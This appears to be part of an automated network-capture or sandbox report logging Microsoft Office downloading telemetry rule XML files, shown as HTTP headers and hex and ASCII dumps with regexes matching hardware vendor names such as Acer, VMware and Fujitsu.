                Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                ETag: "0x8DC582B9698189B"
                x-ms-request-id: 99ffd5e0-b01e-0053-0101-17cdf8000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012647Z-1657d5bbd482krtfgrg72dfbtn00000002e000000000qtrx
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:47 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                Session IDSource IPSource PortDestination IPDestination Port
                20192.168.2.44976313.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:47 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:47 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:47 GMT
                Content-Type: text/xml
                Content-Length: 427
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                ETag: "0x8DC582BA310DA18"
                x-ms-request-id: 915c1ee4-001e-0079-3000-1712e8000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012647Z-1657d5bbd48xlwdx82gahegw4000000002vg00000000xynh
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:47 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                Session IDSource IPSource PortDestination IPDestination Port
                21192.168.2.44976713.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:48 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:48 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:48 GMT
                Content-Type: text/xml
                Content-Length: 469
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                ETag: "0x8DC582BBA701121"
                x-ms-request-id: e72ec3ca-501e-005b-2401-17d7f7000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012648Z-1657d5bbd48t66tjar5xuq22r800000002p000000000tefb
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:48 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                22192.168.2.44976913.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:48 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:48 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:48 GMT
                Content-Type: text/xml
                Content-Length: 477
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                ETag: "0x8DC582BB8CEAC16"
                x-ms-request-id: c2d0a885-201e-0003-7ced-16f85a000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012648Z-1657d5bbd48762wn1qw4s5sd3000000002q0000000009h0d
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:48 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                23192.168.2.44976813.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:48 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:48 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:48 GMT
                Content-Type: text/xml
                Content-Length: 415
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                ETag: "0x8DC582BA41997E3"
                x-ms-request-id: 27ba9a72-001e-0046-2a01-17da4b000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012648Z-1657d5bbd48cpbzgkvtewk0wu000000002yg0000000044p4
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:48 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                Session IDSource IPSource PortDestination IPDestination Port
                24192.168.2.44977113.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:48 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:48 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:48 GMT
                Content-Type: text/xml
                Content-Length: 464
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                ETag: "0x8DC582B97FB6C3C"
                x-ms-request-id: 5a59384b-a01e-0053-3602-178603000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012648Z-1657d5bbd48f7nlxc7n5fnfzh000000002d000000000ect6
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:48 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                Session IDSource IPSource PortDestination IPDestination Port
                25192.168.2.44977013.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:48 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:48 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:48 GMT
                Content-Type: text/xml
                Content-Length: 494
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                ETag: "0x8DC582BB7010D66"
                x-ms-request-id: d3d0b776-b01e-003d-1803-17d32c000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012648Z-1657d5bbd48xdq5dkwwugdpzr000000002zg00000000vbrm
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:48 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                26192.168.2.44977213.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:48 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:48 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:48 GMT
                Content-Type: text/xml
                Content-Length: 419
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                ETag: "0x8DC582B9748630E"
                x-ms-request-id: 09392ef7-101e-0046-3f05-1791b0000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012648Z-1657d5bbd48xdq5dkwwugdpzr0000000033g00000000d4n1
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:48 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                Session IDSource IPSource PortDestination IPDestination Port
                27192.168.2.44977513.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:48 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:48 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:48 GMT
                Content-Type: text/xml
                Content-Length: 468
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                ETag: "0x8DC582B9C8E04C8"
                x-ms-request-id: 81e42967-c01e-0014-5ee9-16a6a3000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012648Z-1657d5bbd48762wn1qw4s5sd3000000002mg00000000meg4
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:48 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                28192.168.2.44977413.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:48 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:48 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:48 GMT
                Content-Type: text/xml
                Content-Length: 404
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                ETag: "0x8DC582B9E8EE0F3"
                x-ms-request-id: f57b7c9f-801e-00a0-4a13-172196000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012648Z-1657d5bbd48762wn1qw4s5sd3000000002kg00000000pzme
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:48 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                Session IDSource IPSource PortDestination IPDestination Port
                29192.168.2.44977313.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:48 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:49 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:48 GMT
                Content-Type: text/xml
                Content-Length: 472
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                ETag: "0x8DC582B9DACDF62"
                x-ms-request-id: 20b36261-201e-006e-7102-17bbe3000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012648Z-1657d5bbd48jwrqbupe3ktsx9w00000002y000000000mnbn
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:49 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                30192.168.2.44977613.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:48 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:49 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:48 GMT
                Content-Type: text/xml
                Content-Length: 428
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                ETag: "0x8DC582BAC4F34CA"
                x-ms-request-id: 6be05283-001e-00a2-2700-17d4d5000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012648Z-1657d5bbd48q6t9vvmrkd293mg00000002q000000000pd7e
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:49 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                Session IDSource IPSource PortDestination IPDestination Port
